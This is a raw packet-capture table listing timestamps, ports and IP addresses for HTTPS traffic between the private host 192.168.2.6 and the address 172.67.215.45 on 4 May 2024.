May 4, 2024 09:48:39.706011057 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.706029892 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.706032038 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.706048965 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.706058025 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.706063032 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.706079960 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.706101894 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.706118107 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.706123114 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.706131935 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.706146002 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.706171989 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.706180096 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.706195116 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.706228971 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.706237078 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.706247091 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.706248045 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.706268072 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.706275940 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.706280947 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.706304073 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.706312895 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.706321001 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.706343889 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.706350088 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.706360102 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.706372976 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.706398010 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.706402063 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.706460953 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.706469059 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.706512928 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.712992907 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:40.229777098 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:40.229821920 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.230201006 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:40.230432987 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:40.230446100 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.559248924 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.561470032 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:40.561480999 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.929305077 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.929352999 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.929390907 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.929397106 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:40.929410934 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.929449081 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:40.929451942 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.929464102 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.929510117 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:40.929519892 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.930166006 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.930216074 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:40.930227041 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.930269003 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.930313110 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:40.930325031 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.930949926 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.930990934 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.930990934 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:40.931006908 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.931047916 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:40.931058884 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.931854963 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.931893110 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.931907892 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:40.931919098 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.931956053 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:40.932682037 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.932849884 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.932888031 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.932893038 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:40.932905912 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.932944059 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:40.933670998 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.933743954 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.933784962 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:40.933785915 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.933796883 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.933835983 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:40.934962988 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.935058117 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.935101986 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:40.935117006 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.935642958 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.935683012 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.935687065 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:40.935699940 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.935734034 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.935758114 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:40.935767889 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.935802937 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:40.936528921 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.936583042 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.936621904 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.936624050 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:40.936634064 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.936670065 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:40.937391043 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.937449932 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.937494040 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:40.937504053 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.938349009 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.938406944 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:40.938421011 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:40.984963894 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.088673115 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.088740110 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.089745998 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.089795113 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.089809895 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.089857101 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.090668917 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.090715885 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.091479063 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.091530085 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.092509985 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.092555046 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.092556000 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.092575073 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.092602015 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.093241930 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.093297005 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.093308926 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.093353987 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.095146894 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.095202923 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.095349073 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.095396042 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.095405102 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.095418930 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.095455885 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.096564054 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.096623898 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.096640110 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.096681118 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.097439051 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.097491026 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.098309040 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.098360062 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.099191904 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.099235058 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.099248886 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.099258900 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.099283934 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.099301100 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.144674063 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.144731045 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.144747972 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.144757032 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.144793987 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.248459101 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.248644114 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.249887943 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.249931097 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.249953032 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.249972105 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.249988079 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.250962019 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.251019955 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.251029968 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.251080036 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.251461983 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.251518011 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.252523899 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.252576113 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.252588987 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.252713919 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.253587008 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.253643990 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.254369974 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.254437923 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.254564047 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.254643917 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.255630970 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.255697966 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.256441116 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.256531000 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.257076979 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.257164955 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.258146048 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.258230925 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.259154081 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.259202003 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.259228945 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.259238958 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.259251118 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.259282112 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.260029078 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.260109901 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.261113882 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.261163950 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.261168957 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.261178017 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.261212111 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.262048006 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.262121916 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.262130976 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.262176991 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.262830019 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.262885094 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.264617920 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.264626980 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.264664888 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.264691114 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.264704943 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.264758110 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.267554045 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.267636061 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.267647982 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.267743111 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.270653009 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.270668983 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.270739079 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.270746946 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.270819902 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.273838997 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.273859978 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.273919106 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.273929119 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.273972034 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.277403116 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.277420044 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.277587891 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.277602911 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.277662039 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.278928995 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.278951883 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.279045105 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.279053926 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.279175997 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.282504082 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.282521009 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.282710075 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.282725096 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.282851934 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.305855036 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.305875063 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.305972099 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.305985928 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.306041002 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.308495045 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.308517933 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.308578968 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.308590889 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.308629990 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.410360098 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.410391092 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.410453081 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.410470963 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.410482883 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.410543919 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.413733006 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.413774014 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.413847923 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.413857937 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.413898945 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.416528940 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.416548967 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.416608095 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.416616917 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.416687012 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.419249058 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.419265985 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.419339895 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.419348001 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.419394016 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.422635078 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.422651052 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.422717094 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.422724962 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.422764063 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.425421000 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.425442934 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.425494909 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.425503016 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.425530910 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.425548077 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.428985119 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.429002047 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.429039955 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.429048061 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.429071903 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.429083109 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.430850029 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.430866957 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.430906057 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.430912971 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.430943966 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.430958986 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.434026003 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.434041977 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.434098005 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.434106112 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.434146881 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.436497927 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.436522961 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.436558962 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.436567068 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.436585903 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.436608076 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.439243078 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.439265013 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.439313889 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.439321995 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.439349890 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.439369917 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.442589045 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.442608118 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.442665100 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.442678928 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.442723989 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.445529938 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.445548058 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.445602894 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.445611000 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.445651054 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.448054075 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.448070049 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.448126078 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.448134899 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.448169947 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.450670958 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.450697899 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.450747967 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.450762987 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.450803995 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.454016924 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.454034090 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.454078913 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.454086065 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.454133034 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.457027912 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.457046986 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.457101107 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.457108021 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.457146883 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.459585905 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.459602118 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.459660053 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.459669113 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.459706068 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.462274075 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.462292910 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.462347031 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.462359905 CEST	443	49708	172.67.215.45	192.168.2.6
